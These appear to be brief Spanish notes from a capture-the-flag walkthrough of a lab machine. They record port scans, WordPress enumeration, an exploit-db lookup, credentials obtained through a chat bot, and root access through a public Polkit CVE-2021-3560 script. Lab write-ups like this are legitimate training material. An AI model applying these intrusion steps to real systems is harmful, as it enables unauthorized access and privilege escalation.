[+] 
Nmap 7.92 scan initiated Mon Mar 14 16:07:55 2022 as: nmap -p- --open -vvv -n -Pn --min-rate 5000 -oG allPorts 10.10.11.143
Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.11.143 ()	Status: Up
Host: 10.10.11.143 ()	Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///

[+]
whatweb 10.10.11.143
http://10.10.11.143 [403 Forbidden] Apache[2.4.37][mod_fcgid/2.3.9], Country[RESERVED][ZZ], Email[webmaster@example.com],
HTML5, HTTPServer[CentOS][Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9], IP[10.10.11.143],
MetaGenerator[HTML Tidy for HTML5 for Linux version 5.7.28], OpenSSL[1.1.1k], PoweredBy[CentOS],
Title[HTTP Server Test Page powered by CentOS], UncommonHeaders[x-backend-server], X-Backend[office.paper]

[+]
X-Backend == subdominio

[+]
sudo nano /etc/hosts
10.10.11.143 office.paper

[+]
whatweb office.paper
http://office.paper [200 OK] Apache[2.4.37][mod_fcgid/2.3.9], Bootstrap[1,5.2.3], Country[RESERVED][ZZ], HTML5,
HTTPServer[CentOS][Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9], IP[10.10.11.143], JQuery,
MetaGenerator[WordPress 5.2.3], OpenSSL[1.1.1k], PHP[7.2.24], PoweredBy[WordPress,WordPress,], Script[text/javascript],
Title[Blunder Tiffin Inc. &#8211; The best paper company in the electric-city Scranton!], UncommonHeaders[link,x-backend-server],
WordPress[5.2.3], X-Backend[office.paper], X-Powered-By[PHP/7.2.24]

[+]
CMD == WordPress[5.2.3]
wpscan --url office.paper -e u (*Enumerar Usuarios*)

[++]
searchsploit wordpress 5.2.3
cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md

[+]
http://office.paper/?static=1
En este texto, una cosa que nos interesa es el enlace "chat.office.paper", de hecho,
es un enlace que permite registrarse en una plataforma de intercambio utilizada por la empresa que tiene el sitio.
Agrego el dominio en mi archivo "hosts" y luego hago clic en el enlace para crear una cuenta.

[+]
Una vez registrados, vemos un chat creado por un usuario que interpreta ordenes ver archivos, listar directorios,etc..
Investigando sobre los archivos obtenemos credenciales de la carpeta del bot.

[+]
credenciales del bot pero como usuario creador de este y con exito.

[+]
user.txt

[+]
Escalar privilegios:
https://github.com/carlospolop/PEASS-ng

[+]
./linpeas.sh

[+]
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

[+]
./proc.sh -u=x -p=x

[+]
su x

[+]
sudo bash

[+]
root.txt
